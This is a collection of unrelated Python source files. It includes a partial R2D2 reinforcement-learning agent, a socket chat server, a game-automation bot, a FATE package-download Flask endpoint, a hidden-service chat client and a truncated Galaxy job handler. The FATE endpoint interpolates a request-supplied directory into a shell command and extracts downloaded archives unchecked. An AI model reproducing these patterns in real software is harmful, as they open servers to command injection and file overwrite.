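#   p = eta * max_i |delta_i| + (1 - eta) * mean_i |delta_i|, with eta = priority_exponent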
priority = self.priority_exponent * np.max(prioritys[batch_i]) + (1-self.priority_exponent) * np.average(prioritys[batch_i])
self.memory.update(indexes[batch_i], batch, priority)
def save_weights(self, filepath, overwrite=False, save_memory=False):
if overwrite or not os.path.isfile(filepath):
d = {
"weights": self.model.get_weights(),
"train": self.train_count.value,
}
with open(filepath, 'wb') as f:
pickle.dump(d, f)
# memory
if save_memory:
d = self.memory.get_memorys()
with open(filepath + ".mem", 'wb') as f:
pickle.dump(d, f)
def load_weights(self, filepath, load_memory=False):
with open(filepath, 'rb') as f:
d = pickle.load(f)
self.model.set_weights(d["weights"])
self.target_model.set_weights(d["weights"])
self.train_count.value = d["train"]
# memory
if load_memory:
filepath = filepath + ".mem"
if os.path.isfile(filepath):
with open(filepath, 'rb') as f:
d = pickle.load(f)
self.memory.set_memorys(d)
#---------------------------------------------------
# actor
#---------------------------------------------------
class ActorStop(rl.callbacks.Callback):
def __init__(self, is_learner_end):
self.is_learner_end = is_learner_end
def on_step_end(self, episode, logs={}):
if self.is_learner_end.value:
raise KeyboardInterrupt()
class Actor():
allocate = "/device:CPU:0"
def getPolicy(self, actor_index, actor_num):
raise NotImplementedError()
def fit(self, index, agent):
raise NotImplementedError()
def actor_run_allocate(allocate, *args):
with tf.device(allocate):
actor_run(*args)
def actor_run(
actor_index,
kwargs,
exp_q,
weights_q,
is_learner_end,
train_count,
is_actor_end,
):
verbose = kwargs["verbose"]
callbacks = kwargs["callbacks"]
actor = kwargs["actors"][actor_index]()
runner = ActorRunner(
actor_index,
kwargs,
actor,
exp_q,
weights_q,
is_learner_end,
train_count,
)
try:
callbacks.on_r2d2_actor_begin(actor_index, runner)
# run
if verbose > 0:
print("Actor{} Start!".format(actor_index))
actor.fit(actor_index, runner)
except KeyboardInterrupt:
pass
except Exception:
print(traceback.format_exc())
try:
if verbose > 0:
print("Actor{} End!".format(actor_index))
callbacks.on_r2d2_actor_end(actor_index, runner)
except Exception:
print(traceback.format_exc())
is_actor_end.value = True
class ActorRunner(rl.core.Agent):
def __init__(self,
actor_index,
kwargs,
actor,
exp_q,
weights_q,
is_learner_end,
train_count,
):
super(ActorRunner, self).__init__(kwargs["processor"])
self.is_learner_end = is_learner_end
self.train_count = train_count
self.kwargs = kwargs
self.callbacks = kwargs.get("callbacks", [])
self.actor_index = actor_index
self.actor = actor
self.exp_q = exp_q
self.weights_q = weights_q
self.actors_num = len(kwargs["actors"])
self.enable_rescaling = kwargs["enable_rescaling"]
self.rescaling_epsilon = kwargs["rescaling_epsilon"]
self.action_policy = actor.getPolicy(actor_index, self.actors_num)
self.nb_actions = kwargs["nb_actions"]
self.input_shape = kwargs["input_shape"]
self.input_sequence = kwargs["input_sequence"]
self.gamma = kwargs["gamma"]
self.reward_multisteps = kwargs["reward_multisteps"]
self.action_interval = kwargs["action_interval"]
self.burnin_length = kwargs["burnin_length"]
self.lstm_type = kwargs["lstm_type"]
self.enable_dueling_network = kwargs["enable_dueling_network"]
self.priority_exponent = kwargs["priority_exponent"]
self.lstm_ful_input_length = kwargs["lstm_ful_input_length"]
self.batch_size = kwargs["batch_size"]
self.verbose = kwargs["verbose"]
# create model
self.model = build_compile_model(kwargs)
if self.lstm_type == LstmType.STATEFUL:
self.lstm = self.model.get_layer("lstm")
model_json = self.model.to_json()
self.action_policy.compile(model_json)
self.compiled = True # super
def reset_states(self): # override
self.repeated_action = 0
if self.lstm_type == LstmType.STATEFUL:
multi_len = self.reward_multisteps + self.lstm_ful_input_length - 1
self.recent_actions = [ 0 for _ in range(multi_len + 1)]
self.recent_rewards = [ 0 for _ in range(multi_len)]
self.recent_rewards_multistep = [ 0 for _ in range(self.lstm_ful_input_length)]
tmp = self.burnin_length + self.input_sequence + multi_len
self.recent_observations = [
np.zeros(self.input_shape) for _ in range(tmp)
]
tmp = self.burnin_length + multi_len + 1
self.recent_observations_wrap = [
[np.zeros(self.input_shape) for _ in range(self.input_sequence)] for _ in range(tmp)
]
# hidden_state: [(batch_size, lstm_units_num), (batch_size, lstm_units_num)]
tmp = self.burnin_length + multi_len + 1+1
self.model.reset_states()
self.recent_hidden_states = [
[K.get_value(self.lstm.states[0]), K.get_value(self.lstm.states[1])] for _ in range(tmp)
]
else:
self.recent_actions = [ 0 for _ in range(self.reward_multisteps+1)]
self.recent_rewards = [ 0 for _ in range(self.reward_multisteps)]
self.recent_rewards_multistep = 0
self.recent_observations = [
np.zeros(self.input_shape) for _ in range(self.input_sequence + self.reward_multisteps)
]
def compile(self, optimizer, metrics=[]): # override
self.compiled = True # super
def save_weights(self, filepath, overwrite=False): # override
if overwrite or not os.path.isfile(filepath):
filepath = filepath.format(index=self.actor_index)
d = self.action_policy.get_weights()
with open(filepath, 'wb') as f:
pickle.dump(d, f)
def load_weights(self, filepath): # override
filepath = filepath.format(index=self.actor_index)
with open(filepath, 'rb') as f:
d = pickle.load(f)
self.action_policy.set_weights(d)
def forward(self, observation): # override
# observation
self.recent_observations.pop(0)
self.recent_observations.append(observation)
if self.lstm_type == LstmType.STATEFUL:
self.recent_observations_wrap.pop(0)
self.recent_observations_wrap.append(self.recent_observations[-self.input_sequence:])
# tmp
self._state0 = self.recent_observations_wrap[-self.burnin_length -1]
else:
# tmp
self._state0 = self.recent_observations[:self.input_sequence]
# tmp
self._qvals = None
self._state1 = self.recent_observations[-self.input_sequence:]
self._state1_np = np.asarray(self._state1)
self._state0_np = np.asarray(self._state0)
if self.training:
# send the experience
if self.lstm_type == LstmType.STATEFUL:
#--- compute the priority
# burn-in is expensive and this value is only used for the initial priority, so it is skipped here
# (the hidden states are the most recent ones, so the model-induced error is negligible)
prioritys = []
for i in range(self.lstm_ful_input_length):
state0 = self._state0_np
state1 = self._state1_np
hidden_states0 = self.recent_hidden_states[self.burnin_length + i]
hidden_states1 = self.recent_hidden_states[self.burnin_length + i + self.reward_multisteps]
action = self.recent_actions[i]
reward = self.recent_rewards_multistep[i]
# tile up to the batch size
state0_batch = np.full((self.batch_size,)+state0.shape, state0)
state1_batch = np.full((self.batch_size,)+state1.shape, state1)
# output of the current Q-network
self.lstm.reset_states(hidden_states0)
state0_qvals = self.model.predict(state0_batch, self.batch_size)[0]
self.lstm.reset_states(hidden_states1)
state1_qvals = self.model.predict(state1_batch, self.batch_size)[0]
maxq = np.max(state1_qvals)
td_error = reward + (self.gamma ** self.reward_multisteps) * maxq
priority = abs(td_error - state0_qvals[action])
prioritys.append(priority)
# compute the combined priority for this sample
priority = self.priority_exponent * np.max(prioritys) + (1-self.priority_exponent) * np.average(prioritys)
# local memory
local_memory = (
self.recent_observations_wrap[:],
self.recent_actions[0:self.lstm_ful_input_length],
self.recent_rewards_multistep[:],
self.recent_hidden_states[0],
priority,
)
else:
state0 = self._state0_np[np.newaxis,:]
state1 = self._state1_np[np.newaxis,:]
action = self.recent_actions[0]
reward = self.recent_rewards_multistep
#--- compute the priority
state0_qvals = self.model.predict(state0, 1)[0]
state1_qvals = self.model.predict(state1, 1)[0]
maxq = np.max(state1_qvals)
td_error = reward + (self.gamma ** self.reward_multisteps) * maxq - state0_qvals[action]
priority = abs(td_error)
# local memory
local_memory = (
self._state0,
action,
reward,
self._state1,
priority,
)
# send to the remote memory
self.exp_q.put(local_memory)
# update the internal state
if self.lstm_type == LstmType.STATEFUL:
self.lstm.reset_states(self.recent_hidden_states[-1])
# update the hidden state while also obtaining the Q-values
state = self._state1_np
pred_state = np.full((self.batch_size,)+state.shape, state) # tile up to the batch size
self._qvals = self.model.predict(pred_state, batch_size=self.batch_size)[0]
hidden_state = [K.get_value(self.lstm.states[0]), K.get_value(self.lstm.states[1])]
self.recent_hidden_states.pop(0)
self.recent_hidden_states.append(hidden_state)
# frame skip (select an action only every action_interval steps)
action = self.repeated_action
if self.step % self.action_interval == 0:
# decide the action
if self.training:
# during training (and when NoisyNet is not used) follow the action policy
action = self.action_policy.select_action(self)
else:
# during testing, or when NoisyNet is used
action = np.argmax(self.get_qvals())
# remember it for action repeat
self.repeated_action = action
# store the action
self.recent_actions.pop(0)
self.recent_actions.append(action)
return action
def get_qvals(self):
if self.lstm_type == LstmType.STATEFUL:
return self._qvals
else:
if self._qvals is None:
state = self._state1_np[np.newaxis,:]
self._qvals = self.model.predict(state, batch_size=1)[0]
return self._qvals
def get_state(self):
return self._state1_np
def get_prev_state(self):
if self.lstm_type == LstmType.STATEFUL:
observation = self._state0_np
action = self.recent_actions[-self.reward_multisteps-1]
reward = self.recent_rewards_multistep[-self.reward_multisteps]
else:
observation = self._state0_np
action = self.recent_actions[0]
reward = self.recent_rewards_multistep
return (observation, action, reward)
def backward(self, reward, terminal): # override
# terminal is True when the env has reached a terminal state
if not self.training:
return []
# store the reward
self.recent_rewards.pop(0)
self.recent_rewards.append(reward)
# compute the multi-step (n-step) discounted return
_tmp = 0
for i in range(-self.reward_multisteps, 0):
r = self.recent_rewards[i]
_tmp += r * (self.gamma ** (i + self.reward_multisteps))
# rescaling
if self.enable_rescaling:
_tmp = rescaling(_tmp)
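# rescaling() is imported from .common (not shown here); it is presumably the
# R2D2-style value rescaling h(x) = sign(x) * (sqrt(|x| + 1) - 1) + eps * x,
# with eps given by rescaling_epsilon.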
if self.lstm_type == LstmType.STATEFUL:
self.recent_rewards_multistep.pop(0)
self.recent_rewards_multistep.append(_tmp)
else:
self.recent_rewards_multistep = _tmp
# update the model if new weights have arrived from the learner
if not self.weights_q.empty():
weights = self.weights_q.get(timeout=1)
# drain the queue, just in case more than one set of weights is queued
while not self.weights_q.empty():
self.weights_q.get(timeout=1)
self.model.set_weights(weights)
return []
@property
def layers(self): # override
return self.model.layers[:]
def fit(self, env, nb_steps=99_999_999_999, callbacks=[], **kwargs): # override
if self.actor_index == -1:
# test_actor: run without the R2D2 callbacks or the ActorStop hook
super().fit(env, nb_steps=nb_steps, callbacks=callbacks, **kwargs)
return
callbacks.extend(self.callbacks.callbacks)
# stop
callbacks.append(ActorStop(self.is_learner_end))
# run the training loop via keras-rl
super().fit(env, nb_steps=nb_steps, callbacks=callbacks, **kwargs)
class R2D2Callback(rl.callbacks.Callback):
def __init__(self):
pass
def on_r2d2_train_begin(self):
pass
def on_r2d2_train_end(self):
pass
def on_r2d2_learner_begin(self, learner):
pass
def on_r2d2_learner_end(self, learner):
pass
def on_r2d2_learner_train_begin(self, learner):
pass
def on_r2d2_learner_train_end(self, learner):
pass
def on_r2d2_actor_begin(self, actor_index, runner):
pass
def on_r2d2_actor_end(self, actor_index, runner):
pass
class R2D2CallbackList(R2D2Callback):
def __init__(self, callbacks):
self.callbacks = callbacks
def on_r2d2_train_begin(self):
for callback in self.callbacks:
callback.on_r2d2_train_begin()
def on_r2d2_train_end(self):
for callback in self.callbacks:
callback.on_r2d2_train_end()
def on_r2d2_learner_begin(self, learner):
for callback in self.callbacks:
callback.on_r2d2_learner_begin(learner)
def on_r2d2_learner_end(self, learner):
for callback in self.callbacks:
callback.on_r2d2_learner_end(learner)
def on_r2d2_learner_train_begin(self, learner):
for callback in self.callbacks:
callback.on_r2d2_learner_train_begin(learner)
def on_r2d2_learner_train_end(self, learner):
for callback in self.callbacks:
callback.on_r2d2_learner_train_end(learner)
def on_r2d2_actor_begin(self, actor_index, runner):
for callback in self.callbacks:
callback.on_r2d2_actor_begin(actor_index, runner)
def on_r2d2_actor_end(self, actor_index, runner):
for callback in self.callbacks:
callback.on_r2d2_actor_end(actor_index, runner)
|
Server.py
|
#server.py
import json
import socket
from threading import Thread
ADDRESS = ('localhost', 12321)
CONNECTION = None
SERVERNAME = "SOCKETER-SERVER"
CONNECTION_POOL = {}
init_msg = """
______ ___ ____ _ _______ _____ _____ ____ __
/ / ___| / _ \ / ___| |/ / ____|_ _| ____| _ \ / /
/ /\___ \| | | | | | ' /| _| | | | _| | |_) | / /
/ / ___) | |_| | |___| . \| |___ | | | |___| _ < / /
/_/ |____/ \___/ \____|_|\_\_____| |_| |_____|_| \_\/_/
"""
def init():
global CONNECTION
CONNECTION = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
CONNECTION.bind(ADDRESS)
CONNECTION.listen(5)
print(init_msg)
def send_msg(socket1, username, cmd, data, target):
jdata = {}
jdata['cmd'] = cmd
jdata['target'] = target
jdata['from'] = username
jdata['data'] = data
jstr = json.dumps(jdata)
socket1.sendall(jstr.encode('utf-8'))
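# Wire format: one JSON object per send, e.g.
#   {"cmd": "act_send_msg", "target": "bob", "from": "alice", "data": "hi"}
# The cmd values handled by msg_control below are act_connect, act_send_msg and
# act_req_list (user names above are illustrative).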
def connection_control():
while True:
client, client_address = CONNECTION.accept()
newThread = Thread(target=msg_control,args=(client,))
newThread.setDaemon(True)
newThread.start()
def msg_control(client):
client.sendall((init_msg + "\n Connect to chat-server successfully!").encode('utf-8'))
while True:
try:
data = client.recv(1024).decode('utf-8')
jdata = json.loads(data)
user = jdata['from']
target = jdata['target']
if jdata['cmd'] == "act_connect":
CONNECTION_POOL[user] = client
if jdata['cmd'] == "act_send_msg":
if jdata['target'] not in CONNECTION_POOL:
send_msg(client,SERVERNAME,"ERROR",f"ERROR:User{jdata['target']} does not online!",user)
else:
target_connection = CONNECTION_POOL[target]
send_msg(target_connection,user,"act_send_msg",jdata['data'],target)
elif jdata['cmd'] == "act_req_list":
print(user + " req_list")
userlist = str(CONNECTION_POOL.keys())
send_msg(client,SERVERNAME,"return_list",userlist,user)
except Exception:
remove_client(user)
break
def remove_client(user):
connection = CONNECTION_POOL.get(user)
if connection is not None:
connection.close()
CONNECTION_POOL.pop(user, None)
print(f"{user} Offline.")
if __name__ == "__main__":
init()
t1 = Thread(target=connection_control)
t1.setDaemon(True)
t1.start()
while True:
cmd = input("[SOCKETER-SERVER]:")
if cmd == "list":
print(CONNECTION_POOL.keys())
if cmd == "exit":
break
if cmd == "list1":
print(CONNECTION_POOL)
|
gem_transmute.py
|
from screen import Screen
from game_stats import GameStats
from template_finder import TemplateFinder
from transmute import Transmute
import threading
import keyboard
from ui.ui_manager import UiManager
if __name__ == "__main__":
s = Screen()
finder = TemplateFinder(s)
stats = GameStats()
ui = UiManager(s, finder, stats)
cuber = Transmute(s, finder, stats, ui)
bot_thread = threading.Thread(target=cuber.run_transmutes, args=[True])
bot_thread.daemon = True
keyboard.add_hotkey("f11", lambda: bot_thread.start())
keyboard.wait("f12")
|
package_app.py
|
#
# Copyright 2020 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import shutil
import tarfile
import requests
from subprocess import getoutput
from flask import Flask, request
from settings import stat_logger
from multiprocessing import Process
from utils.api_utils import get_json_result
from utils.base_utils import current_timestamp
from utils.file_utils import get_project_base_directory, get_package_dir_by_version
from utils.job_utils import check_config
from ruamel import yaml
from datetime import datetime
from db.db_models import Package, DB
manager = Flask(__name__)
@manager.errorhandler(500)
def internal_server_error(e):
stat_logger.exception(e)
return get_json_result(retcode=100, retmsg=str(e))
@manager.route('/local', methods=['POST'])
def check_local_package():
request_data = request.json
required_parameters = ['dir']
check_config(request_data, required_parameters)
if os.path.exists(request_data['dir']) and os.path.exists(os.path.join(request_data['dir'], 'roles')):
# get package module version
var_fp = os.path.join(request_data['dir'], 'example', 'var_files', 'exp', 'fate_init')
versions = {}
if os.path.exists(var_fp):
with open(var_fp, 'r') as fin:
versions = yaml.safe_load(fin.read()).get('versions', {})
output = getoutput(f"du -d 1 -h {os.path.join(request_data['dir'], 'roles')}").split('\n')
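# Each line of `du -d 1 -h` is "<size>\t<path>"; the directory basename is
# taken as the module name, and the top-level "roles" entry itself is skipped.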
result = []
for s in output:
items = s.split()
module_name = os.path.basename(items[1])
if module_name != 'roles':
result.append({
'module': module_name,
'size': items[0],
'time': datetime.fromtimestamp(os.path.getctime(items[1])).strftime('%Y%m%d'),
'description': module_name if not versions.get(module_name) else f"{module_name} {versions.get(module_name)}",
'version': versions.get(module_name, None)
})
return get_json_result(data={'version': versions.get('fate_flow'), 'list': result})
return get_json_result(retcode=100, retmsg='package dir not exists.')
@manager.route('/download', methods=['POST'])
def download_package():
request_data = request.json
required_parameters = ['version', 'url']
check_config(request_data, required_parameters)
if not request_data['url']:
raise Exception(f"illegal url {request_data['url']}")
if not request_data['version']:
raise Exception(f"illegal url {request_data['version']}")
os.makedirs(os.path.join(get_project_base_directory(), 'packages'), exist_ok=True)
package_dir = get_package_dir_by_version(request_data.get('version'))
if os.path.exists(package_dir):
return get_json_result(retcode=100,
retmsg=f"Downloading mirror with version {request_data.get('version')} failed, "
f"package dir {package_dir} already exists.")
package_instance = Package.get_or_none(Package.f_version == request_data['version'],
Package.f_status == 'success')
if package_instance:
return get_json_result(retcode=100,
retmsg=f"Downloading mirror with version {request_data.get('version')} failed, "
f"version info has been stored in database.")
request_data['dir'] = package_dir
p = Process(target=do_download, args=(request_data, ))
p.start()
return get_json_result(retmsg=f"Start downloading mirror from url: {request_data.get('url')}.",
data= {'version': request_data.get('version')})
@DB.connection_context()
def do_download(data):
path = os.path.abspath(os.path.join(data.get('dir'), os.pardir, f'temp-{data["version"]}'))
os.makedirs(path, exist_ok=True)
fp = os.path.join(path, "package.tar.gz")
url = data.get('url')
p = Package()
p.f_status = 'running'
p.f_version = data.get('version')
p.f_start_time = current_timestamp()
p.save(force_insert=True)
try:
stat_logger.info('Start downloading process')
with requests.get(url, stream=True) as req:
with open(fp, 'wb') as f:
for chunk in req.iter_content(chunk_size=1024*5):
if chunk:
f.write(chunk)
except Exception as e:
stat_logger.exception(e)
else:
end_time = current_timestamp()
p.f_end_time = end_time
p.f_elapsed = p.f_end_time - p.f_start_time
p.f_status = 'success'
tar = tarfile.open(fp)
try:
dir_name = tar.getmembers()[0].name
tar.extractall(path=path)
stat_logger.info(f"rename: src: {os.path.join(path, dir_name)}")
dst = data.get('dir')
stat_logger.info(f"rename: dst: {dst}")
os.rename(src=os.path.join(path, dir_name), dst=dst)
shutil.rmtree(path=path)
except Exception as e:
stat_logger.exception(e)
p.f_status = 'failed'
finally:
tar.close()
p.save()
DB.commit()
@manager.route('/remote', methods=['POST'])
def query_package():
request_data = request.json
required_parameters = ['version']
check_config(request_data, required_parameters)
p = get_package_download_record(request_data['version'])
if p:
return get_json_result(data=p.to_json())
return get_json_result(retcode=100, retmsg=f"can not found version {request_data['version']} record")
@DB.connection_context()
def get_package_download_record(version: str):
return Package.get_or_none(f_version=version)
|
console_chat.py
|
import json
import threading
import sys
import os
import logging
import time
import pandas as pd
logger = logging.getLogger(__name__)
_dir = os.path.abspath(os.path.dirname(__file__))
_dir = os.path.join(_dir, "../")
_dir = os.path.abspath(_dir)
sys.path.append(_dir)
from allium_messenger.connection import AlliumConnection
def process_message_functor(payload):
decoded = json.loads(payload.decode("utf-8"))
logger.error("--------------------------------------------------------------")
logger.info("test")
print(f"received message from {decoded['address']}:")
print(f" {decoded['message']}")
print("--------------------------------------------------------------")
return
def send_loop(connection):
time.sleep(3)
while True:
message = input("Your message: ")
logger.info(f"{message}, {connection.get_service_name()[0]}")
connection.send_message(message, connection.get_service_name()[0])
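# get_contacts_from_file expects a CSV with at least "name" and "identifier"
# columns, for example (values are illustrative):
#   name,identifier
#   alice,exampleidentifier1234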
def get_contacts_from_file(filename):
contacts = pd.read_csv(filename)
contacts = {row["name"]: row["identifier"] for _,row in contacts.iterrows()}
logger.info(contacts)
return contacts
def main():
contacts_file = os.path.join(os.path.abspath(os.path.dirname(__file__)), "contacts.csv")
contacts = get_contacts_from_file(contacts_file)
identifiers = {contacts[k]: k for k in contacts}
my_connection = AlliumConnection(hidden_svc_dir='hidden_service', process_message_functor=process_message_functor)
try:
service = threading.Thread(target=my_connection.create_service, args=(), daemon=True)
service.start()
except:
logger.error("Error: unable to start thread")
logger.info("ready for input loop")
send_loop(connection=my_connection)
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
main()
|
handler.py
|
"""
Galaxy job handler, prepares, runs, tracks, and finishes Galaxy jobs
"""
import os
import time
import logging
import threading
from Queue import Queue, Empty
from sqlalchemy.sql.expression import and_, or_, select, func, true, null
from galaxy import model
from galaxy.util.sleeper import Sleeper
from galaxy.jobs import JobWrapper, TaskWrapper, JobDestination
from galaxy.jobs.mapper import JobNotReadyException
log = logging.getLogger( __name__ )
# States for running a job. These are NOT the same as data states
JOB_WAIT, JOB_ERROR, JOB_INPUT_ERROR, JOB_INPUT_DELETED, JOB_READY, JOB_DELETED, JOB_ADMIN_DELETED, JOB_USER_OVER_QUOTA = 'wait', 'error', 'input_error', 'input_deleted', 'ready', 'deleted', 'admin_deleted', 'user_over_quota'
DEFAULT_JOB_PUT_FAILURE_MESSAGE = 'Unable to run job due to a misconfiguration of the Galaxy job running system. Please contact a site administrator.'
class JobHandler( object ):
"""
Handle the preparation, running, tracking, and finishing of jobs
"""
def __init__( self, app ):
self.app = app
# The dispatcher launches the underlying job runners
self.dispatcher = DefaultJobDispatcher( app )
# Queues for starting and stopping jobs
self.job_queue = JobHandlerQueue( app, self.dispatcher )
self.job_stop_queue = JobHandlerStopQueue( app, self.dispatcher )
def start( self ):
self.job_queue.start()
def shutdown( self ):
self.job_queue.shutdown()
self.job_stop_queue.shutdown()
class JobHandlerQueue( object ):
"""
Job Handler's Internal Queue, this is what actually implements waiting for
jobs to be runnable and dispatching to a JobRunner.
"""
STOP_SIGNAL = object()
def __init__( self, app, dispatcher ):
"""Initializes the Job Handler Queue, creates (unstarted) monitoring thread"""
self.app = app
self.dispatcher = dispatcher
self.sa_session = app.model.context
self.track_jobs_in_database = self.app.config.track_jobs_in_database
# Initialize structures for handling job limits
self.__clear_job_count()
# Keep track of the pid that started the job manager, only it
# has valid threads
self.parent_pid = os.getpid()
# Contains new jobs. Note this is not used if track_jobs_in_database is True
self.queue = Queue()
# Contains jobs that are waiting (only use from monitor thread)
self.waiting_jobs = []
# Contains wrappers of jobs that are limited or ready (so they aren't created unnecessarily/multiple times)
self.job_wrappers = {}
# Helper for interruptable sleep
self.sleeper = Sleeper()
self.running = True
self.monitor_thread = threading.Thread( name="JobHandlerQueue.monitor_thread", target=self.__monitor )
self.monitor_thread.setDaemon( True )
def start( self ):
"""
Starts the JobHandler's thread after checking for any unhandled jobs.
"""
# Recover jobs at startup
self.__check_jobs_at_startup()
# Start the queue
self.monitor_thread.start()
log.info( "job handler queue started" )
def job_wrapper( self, job, use_persisted_destination=False ):
return JobWrapper( job, self, use_persisted_destination=use_persisted_destination )
def job_pair_for_id( self, id ):
job = self.sa_session.query( model.Job ).get( id )
return job, self.job_wrapper( job, use_persisted_destination=True )
def __check_jobs_at_startup( self ):
"""
Checks all jobs that are in the 'new', 'queued' or 'running' state in
the database and requeues or cleans up as necessary. Only run as the
job handler starts.
If user activation is enforced, jobs belonging to inactive users are filtered out.
"""
jobs_at_startup = []
if self.track_jobs_in_database:
in_list = ( model.Job.states.QUEUED,
model.Job.states.RUNNING )
else:
in_list = ( model.Job.states.NEW,
model.Job.states.QUEUED,
model.Job.states.RUNNING )
if self.app.config.user_activation_on:
jobs_at_startup = self.sa_session.query( model.Job ).enable_eagerloads( False ) \
.outerjoin( model.User ) \
.filter( model.Job.state.in_( in_list ) &
( model.Job.handler == self.app.config.server_name ) &
or_( ( model.Job.user_id == null() ), ( model.User.active == true() ) ) ).all()
else:
jobs_at_startup = self.sa_session.query( model.Job ).enable_eagerloads( False ) \
.filter( model.Job.state.in_( in_list ) &
( model.Job.handler == self.app.config.server_name ) ).all()
for job in jobs_at_startup:
if not self.app.toolbox.has_tool( job.tool_id, job.tool_version, exact=True ):
log.warning( "(%s) Tool '%s' removed from tool config, unable to recover job" % ( job.id, job.tool_id ) )
self.job_wrapper( job ).fail( 'This tool was disabled before the job completed. Please contact your Galaxy administrator.' )
elif job.job_runner_name is not None and job.job_runner_external_id is None:
# This could happen during certain revisions of Galaxy where a runner URL was persisted before the job was dispatched to a runner.
log.debug( "(%s) Job runner assigned but no external ID recorded, adding to the job handler queue" % job.id )
job.job_runner_name = None
if self.track_jobs_in_database:
job.set_state( model.Job.states.NEW )
else:
self.queue.put( ( job.id, job.tool_id ) )
elif job.job_runner_name is not None and job.job_runner_external_id is not None and job.destination_id is None:
# This is the first start after upgrading from URLs to destinations, convert the URL to a destination and persist
job_wrapper = self.job_wrapper( job )
job_destination = self.dispatcher.url_to_destination(job.job_runner_name)
if job_destination.id is None:
job_destination.id = 'legacy_url'
job_wrapper.set_job_destination(job_destination, job.job_runner_external_id)
self.dispatcher.recover( job, job_wrapper )
log.info('(%s) Converted job from a URL to a destination and recovered' % (job.id))
elif job.job_runner_name is None:
# Never (fully) dispatched
log.debug( "(%s) No job runner assigned and job still in '%s' state, adding to the job handler queue" % ( job.id, job.state ) )
if self.track_jobs_in_database:
job.set_state( model.Job.states.NEW )
else:
self.queue.put( ( job.id, job.tool_id ) )
else:
# Already dispatched and running
job_wrapper = self.job_wrapper( job )
# Use the persisted destination as its params may differ from
# what's in the job_conf xml
job_destination = JobDestination(id=job.destination_id, runner=job.job_runner_name, params=job.destination_params)
# resubmits are not persisted (it's a good thing) so they
# should be added back to the in-memory destination on startup
try:
config_job_destination = self.app.job_config.get_destination( job.destination_id )
job_destination.resubmit = config_job_destination.resubmit
except KeyError:
log.warning( '(%s) Recovered destination id (%s) does not exist in job config (but this may be normal in the case of a dynamically generated destination)', job.id, job.destination_id )
job_wrapper.job_runner_mapper.cached_job_destination = job_destination
self.dispatcher.recover( job, job_wrapper )
if self.sa_session.dirty:
self.sa_session.flush()
def __monitor( self ):
"""
Continually iterate the waiting jobs, checking if each is ready to
run and dispatching if so.
"""
while self.running:
try:
# If jobs are locked, there's nothing to monitor and we skip
# to the sleep.
if not self.app.job_manager.job_lock:
self.__monitor_step()
except:
log.exception( "Exception in monitor_step" )
# Sleep
self.sleeper.sleep( 1 )
def __monitor_step( self ):
"""
Called repeatedly by `monitor` to process waiting jobs. Gets any new
jobs (either from the database or from its own queue), then iterates
over all new and waiting jobs to check the state of the jobs each
depends on. If the job has dependencies that have not finished, it
goes to the waiting queue. If the job has dependencies with errors,
it is marked as having errors and removed from the queue. If the job
belongs to an inactive user it is ignored.
Otherwise, the job is dispatched.
"""
# Pull all new jobs from the queue at once
jobs_to_check = []
resubmit_jobs = []
if self.track_jobs_in_database:
# Clear the session so we get fresh states for job and all datasets
self.sa_session.expunge_all()
# Fetch all new jobs
hda_not_ready = self.sa_session.query(model.Job.id).enable_eagerloads(False) \
.join(model.JobToInputDatasetAssociation) \
.join(model.HistoryDatasetAssociation) \
.join(model.Dataset) \
.filter(and_( (model.Job.state == model.Job.states.NEW ),
or_( ( model.HistoryDatasetAssociation._state == model.HistoryDatasetAssociation.states.FAILED_METADATA ),
( model.HistoryDatasetAssociation.deleted == true() ),
( model.Dataset.state != model.Dataset.states.OK ),
( model.Dataset.deleted == true() ) ) ) ).subquery()
ldda_not_ready = self.sa_session.query(model.Job.id).enable_eagerloads(False) \
.join(model.JobToInputLibraryDatasetAssociation) \
.join(model.LibraryDatasetDatasetAssociation) \
.join(model.Dataset) \
.filter(and_((model.Job.state == model.Job.states.NEW),
or_((model.LibraryDatasetDatasetAssociation._state != null()),
(model.LibraryDatasetDatasetAssociation.deleted == true()),
(model.Dataset.state != model.Dataset.states.OK),
(model.Dataset.deleted == true())))).subquery()
if self.app.config.user_activation_on:
jobs_to_check = self.sa_session.query(model.Job).enable_eagerloads(False) \
.outerjoin( model.User ) \
.filter(and_((model.Job.state == model.Job.states.NEW),
or_((model.Job.user_id == null()), (model.User.active == true())),
(model.Job.handler == self.app.config.server_name),
~model.Job.table.c.id.in_(hda_not_ready),
~model.Job.table.c.id.in_(ldda_not_ready))) \
.order_by(model.Job.id).all()
else:
jobs_to_check = self.sa_session.query(model.Job).enable_eagerloads(False) \
.filter(and_((model.Job.state == model.Job.states.NEW),
(model.Job.handler == self.app.config.server_name),
~model.Job.table.c.id.in_(hda_not_ready),
~model.Job.table.c.id.in_(ldda_not_ready))) \
.order_by(model.Job.id).all()
# Fetch all "resubmit" jobs
resubmit_jobs = self.sa_session.query(model.Job).enable_eagerloads(False) \
.filter(and_((model.Job.state == model.Job.states.RESUBMITTED),
(model.Job.handler == self.app.config.server_name))) \
.order_by(model.Job.id).all()
else:
# Get job objects and append to watch queue for any which were
# previously waiting
for job_id in self.waiting_jobs:
jobs_to_check.append( self.sa_session.query( model.Job ).get( job_id ) )
try:
while 1:
message = self.queue.get_nowait()
if message is self.STOP_SIGNAL:
return
# Unpack the message
job_id, tool_id = message
# Get the job object and append to watch queue
jobs_to_check.append( self.sa_session.query( model.Job ).get( job_id ) )
except Empty:
pass
# Ensure that we get new job counts on each iteration
self.__clear_job_count()
# Check resubmit jobs first so that limits of new jobs will still be enforced
for job in resubmit_jobs:
log.debug( '(%s) Job was resubmitted and is being dispatched immediately', job.id )
# Reassemble resubmit job destination from persisted value
jw = self.job_wrapper( job )
jw.job_runner_mapper.cached_job_destination = JobDestination( id=job.destination_id, runner=job.job_runner_name, params=job.destination_params )
self.increase_running_job_count(job.user_id, jw.job_destination.id)
self.dispatcher.put( jw )
# Iterate over new and waiting jobs and look for any that are
# ready to run
new_waiting_jobs = []
for job in jobs_to_check:
try:
# Check the job's dependencies, requeue if they're not done.
# Some of these states will only happen when using the in-memory job queue
job_state = self.__check_job_state( job )
if job_state == JOB_WAIT:
new_waiting_jobs.append( job.id )
